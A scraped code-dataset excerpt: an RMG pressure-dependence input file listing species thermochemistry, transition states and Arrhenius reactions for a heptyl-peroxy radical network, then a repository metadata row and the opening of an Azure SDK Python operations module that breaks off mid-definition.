thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.331826,0.102878,-8.67857e-05,4.38793e-08,-9.97788e-12,-15451,34.63], Tmin=(100,'K'), Tmax=(996.253,'K')), NASAPolynomial(coeffs=[9.10012,0.0650087,-2.97678e-05,5.72457e-09,-4.0335e-13,-17330.4,-10.8383], Tmin=(996.253,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-129.711,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOOH)"""),
)
species(
label = 'CC[CH]C(CCC)OO(140)',
structure = SMILES('CC[CH]C(CCC)OO'),
E0 = (-116.195,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.541478,0.103807,-8.37226e-05,3.74479e-08,-7.20635e-12,-13815,38.067], Tmin=(100,'K'), Tmax=(1185.08,'K')), NASAPolynomial(coeffs=[12.9953,0.058117,-2.5892e-05,4.91572e-09,-3.43586e-13,-17023.5,-29.5387], Tmin=(1185.08,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-116.195,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH)"""),
)
species(
label = 'C[CH]CC(CCC)OO(141)',
structure = SMILES('C[CH]CC(CCC)OO'),
E0 = (-122.164,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.289445,0.100884,-8.27272e-05,4.0318e-08,-8.7966e-12,-14544,37.6068], Tmin=(100,'K'), Tmax=(1036.34,'K')), NASAPolynomial(coeffs=[9.41781,0.0634168,-2.84961e-05,5.43144e-09,-3.80742e-13,-16555.9,-9.57154], Tmin=(1036.34,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-122.164,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)OO(142)',
structure = SMILES('[CH2]CCC(CCC)OO'),
E0 = (-111.364,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.603592,0.103441,-8.16947e-05,3.51448e-08,-6.43845e-12,-13230.4,37.7671], Tmin=(100,'K'), Tmax=(1246.47,'K')), NASAPolynomial(coeffs=[14.1561,0.056077,-2.46975e-05,4.66063e-09,-3.24428e-13,-16909.9,-36.6921], Tmin=(1246.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.364,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ)"""),
)
species(
label = 'CCC=CCCC(122)',
structure = SMILES('CCC=CCCC'),
E0 = (-98.9731,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (98.1861,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.516528,0.0646821,-1.31158e-05,-1.94274e-08,9.49365e-12,-11768.3,29.5503], Tmin=(100,'K'), Tmax=(1093.68,'K')), NASAPolynomial(coeffs=[12.5234,0.0444655,-1.78892e-05,3.29347e-09,-2.28557e-13,-15811.9,-35.9302], Tmin=(1093.68,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-98.9731,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(486.397,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH)"""),
)
species(
label = 'HO2(10)',
structure = SMILES('[O]O'),
E0 = (2.67648,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1112.8,1388.53,3298.45],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.02957,-0.00263999,1.52235e-05,-1.71679e-08,6.26771e-12,322.677,4.84424], Tmin=(100,'K'), Tmax=(923.901,'K')), NASAPolynomial(coeffs=[4.1513,0.00191152,-4.11308e-07,6.35038e-11,-4.86452e-15,83.4341,3.09359], Tmin=(923.901,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(2.67648,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""HO2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,29226.7,5.11107], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,29226.7,5.11085], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCCC([O])CCC(151)',
structure = SMILES('CCCC([O])CCC'),
E0 = (-157.754,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (115.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.447159,0.089151,-5.8819e-05,1.98848e-08,-2.76336e-12,-18806.6,33.7866], Tmin=(100,'K'), Tmax=(1640.09,'K')), NASAPolynomial(coeffs=[18.0491,0.0440406,-1.75618e-05,3.11448e-09,-2.07048e-13,-24873.7,-64.5982], Tmin=(1640.09,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-157.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(532.126,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43375e-09,2.58635e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.97591,0.0016414,-7.19719e-07,1.25377e-10,-7.91522e-15,-1025.85,5.53754], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-29.8083,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (195.023,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (234.086,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (204.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (247.602,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (200.694,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (241.633,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (252.433,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (278.096,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-3.6475,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-32.0968,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-87.2015,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-54.8589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-40.7595,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (85.2504,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['O2(2)', 'CCC[CH]CCC(73)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.54e+12,'cm^3/(mol*s)','+|-',1e+12), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 112 used for O2_birad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;O2_birad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction6',
reactants = ['CCC[CH]O[O](143)', 'npropyl(70)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(1.15e+14,'cm^3/(mol*s)','*|/',2), n=-0.35, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using template [C_rad/H/NonDe;C_rad/H2/Cs] for rate rule [C_rad/H/CsO;C_rad/H2/Cs]
Euclidian distance = 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction7',
reactants = ['H(3)', 'CCC[C](CCC)O[O](144)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.68468e+06,'m^3/(mol*s)'), n=-0.0135, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [C_rad/NonDe;Y_rad] for rate rule [C_rad/NonDeCO;H_rad]
Euclidian distance = 2.2360679775
family: R_Recombination
Ea raised from -0.9 to 0 kJ/mol."""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(32)', '[CH2]C(CCC)O[O](145)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(8.73e+14,'cm^3/(mol*s)'), n=-0.699, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 11 used for C_rad/H2/Cs;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_rad/H2/Cs]
Euclidian distance = 0
family: R_Recombination
Ea raised from -0.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['H(3)', 'CC[CH]C(CCC)O[O](146)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
# Auto-generated RMG (Reaction Mechanism Generator) pressure-dependence input.
# Each reaction() entry pairs a labelled transition state with modified-Arrhenius
# kinetics; the triple-quoted `comment` strings are data recording the rate-rule
# provenance (training reaction, Euclidian distance, family) and must not be edited.
reaction(
    label = 'reaction10',
    reactants = ['[CH2]CC(CCC)O[O](147)', 'CH3(18)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS6',
    kinetics = Arrhenius(A=(1.23e+15,'cm^3/(mol*s)'), n=-0.562, Ea=(0.085772,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 10 used for C_methyl;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_methyl]
Euclidian distance = 0
family: R_Recombination"""),
)

reaction(
    label = 'reaction11',
    reactants = ['H(3)', 'C[CH]CC(CCC)O[O](148)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS7',
    kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)

reaction(
    label = 'reaction12',
    reactants = ['H(3)', '[CH2]CCC(CCC)O[O](149)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS8',
    kinetics = Arrhenius(A=(3.48677e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)

reaction(
    label = 'reaction9',
    reactants = ['CH2(S)(24)', 'CCCC(CC)O[O](150)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS9',
    kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)

reaction(
    label = 'reaction2',
    reactants = ['CCCC(CCC)O[O](138)'],
    products = ['CCC[C](CCC)OO(139)'],
    transitionState = 'TS10',
    kinetics = Arrhenius(A=(4.97e+09,'s^-1'), n=1.01, Ea=(160.958,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 245 used for R3H_SS_O;O_rad_out;Cs_H_out_Cs2
Exact match found for rate rule [R3H_SS_O;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 0
family: intra_H_migration"""),
)

reaction(
    label = 'reaction3',
    reactants = ['CC[CH]C(CCC)OO(140)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS11',
    kinetics = Arrhenius(A=(2960,'s^-1'), n=2.11, Ea=(84.0984,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 323 used for R4H_SSS;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)

reaction(
    label = 'reaction4',
    reactants = ['CCCC(CCC)O[O](138)'],
    products = ['C[CH]CC(CCC)OO(141)'],
    transitionState = 'TS12',
    kinetics = Arrhenius(A=(1.352e+11,'s^-1'), n=0.21, Ea=(77.404,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 261 used for R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: intra_H_migration"""),
)

reaction(
    label = 'reaction5',
    reactants = ['[CH2]CCC(CCC)OO(142)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS13',
    kinetics = Arrhenius(A=(135.127,'s^-1'), n=2.18479, Ea=(56.5049,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6H_SSSSS;C_rad_out_2H;XH_out] for rate rule [R6H_SSSSS;C_rad_out_2H;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)

reaction(
    label = 'reaction14',
    reactants = ['CCCC(CCC)O[O](138)'],
    products = ['CCC=CCCC(122)', 'HO2(10)'],
    transitionState = 'TS14',
    kinetics = Arrhenius(A=(6.6e+09,'s^-1'), n=1.01, Ea=(123.846,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 6 used for R2OO_HNd_HNd
Exact match found for rate rule [R2OO_HNd_HNd]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: HO2_Elimination_from_PeroxyRadical"""),
)

reaction(
    label = 'reaction15',
    reactants = ['O(4)', 'CCCC([O])CCC(151)'],
    products = ['CCCC(CCC)O[O](138)'],
    transitionState = 'TS15',
    kinetics = Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 3 used for O_rad/NonDe;O_birad
Exact match found for rate rule [O_rad/NonDe;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination
Ea raised from -2.9 to 0 kJ/mol."""),
)
# Pressure-dependent network 42: one unimolecular isomer (the heptyl-peroxy
# radical) reachable from the bimolecular O2 + heptyl channel, relaxed by a
# 50/50 N2/Ne bath gas.
network(
    label = '42',
    isomers = [
        'CCCC(CCC)O[O](138)',
    ],
    reactants = [
        ('O2(2)', 'CCC[CH]CCC(73)'),
    ],
    bathGas = {
        'N2': 0.5,
        'Ne': 0.5,
    },
)
# Master-equation settings for network 42: modified-strong-collision solver
# over 300-2000 K (8 points) and 0.01-100 bar (5 points), fitted to a
# Chebyshev polynomial of order 6 in T and 4 in P.
pressureDependence(
    label = '42',
    Tmin = (300,'K'),
    Tmax = (2000,'K'),
    Tcount = 8,
    Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
    Pmin = (0.01,'bar'),
    Pmax = (100,'bar'),
    Pcount = 5,
    Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
    maximumGrainSize = (0.5,'kcal/mol'),
    minimumGrainCount = 250,
    method = 'modified strong collision',
    interpolationModel = ('Chebyshev', 6, 4),
    activeKRotor = True,
    activeJRotor = True,
    rmgmode = True,
)
| [
"[email protected]"
]
| |
30fc99c1e299f230a6679c3c4150367665d667e7 | 30736dab9d8e682e5603d4803349144a5f6a84fb | /sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_08_01/operations/_resources_operations.py | 2532fbe114047a2aa4df6e55706d0512029e99c1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | montgomp/azure-sdk-for-python | 6fcaffc59f4321852aa71109691e94ad38c66464 | 0ffb0b0de095b97cbc5b69309bbce0a3b91d3eb4 | refs/heads/master | 2020-12-06T11:08:01.683369 | 2020-01-07T23:24:42 | 2020-01-07T23:24:42 | 232,445,563 | 1 | 0 | MIT | 2020-01-08T00:45:33 | 2020-01-08T00:45:33 | null | UTF-8 | Python | false | false | 64,532 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ResourcesOperations(object):
"""ResourcesOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version to use for this operation. Constant value: "2019-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
    """Wire up the operation group with the shared pipeline objects.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # The API version is fixed to the 2019-08-01 Resources service contract
